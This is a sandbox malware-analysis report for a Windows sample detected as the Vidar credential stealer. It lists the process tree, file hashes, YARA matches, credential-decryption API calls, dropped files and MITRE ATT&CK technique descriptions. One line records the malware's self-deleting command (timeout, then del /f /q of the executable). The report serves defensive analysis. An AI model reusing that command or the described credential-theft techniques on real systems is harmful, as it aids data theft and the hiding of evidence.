Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: file.exePID: 5924, Parent PID: 5884

General

Target ID:	1
Start time:	00:10:03
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0xe80000
File size:	371200 bytes
MD5 hash:	5367709F0A96713B5C9A518E13F306D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.232045586.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: file.exePID: 5896, Parent PID: 5924

General

Target ID:	2
Start time:	00:10:03
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0xe80000
File size:	371200 bytes
MD5 hash:	5367709F0A96713B5C9A518E13F306D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: cmd.exePID: 5984, Parent PID: 5896

General

Target ID:	3
Start time:	00:10:09
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit
Imagebase:	0xa60000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 4656, Parent PID: 5984

General

Target ID:	4
Start time:	00:10:09
Start date:	30/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: timeout.exePID: 3384, Parent PID: 5984

General

Target ID:	5
Start time:	00:10:09
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 6
Imagebase:	0xdb0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

⊘No disassembly

Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040C670 __EH_prolog3_GS,_memset,lstrcat,lstrcat,lstrcat,CloseHandle,Sleep,OpenEventA,CreateEventA,_memset,lstrcat,lstrcat,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,Sleep,_memset,lstrcat,lstrcat,lstrcat,lstrcat,CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA,CreateThread,CreateThread,Sleep,Sleep,_memset,_memset,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040F7E5 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040FA24 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040F5CF _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcat,lstrcat,
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040F78C CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Vidar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\10268862039712444505777708

C:\ProgramData\11565709257171813179063097

C:\ProgramData\48870274652683548820497570

C:\ProgramData\58308559385186415876143610

C:\ProgramData\82308976761520470245380715

C:\ProgramData\82668342394913559298137947

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
file.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre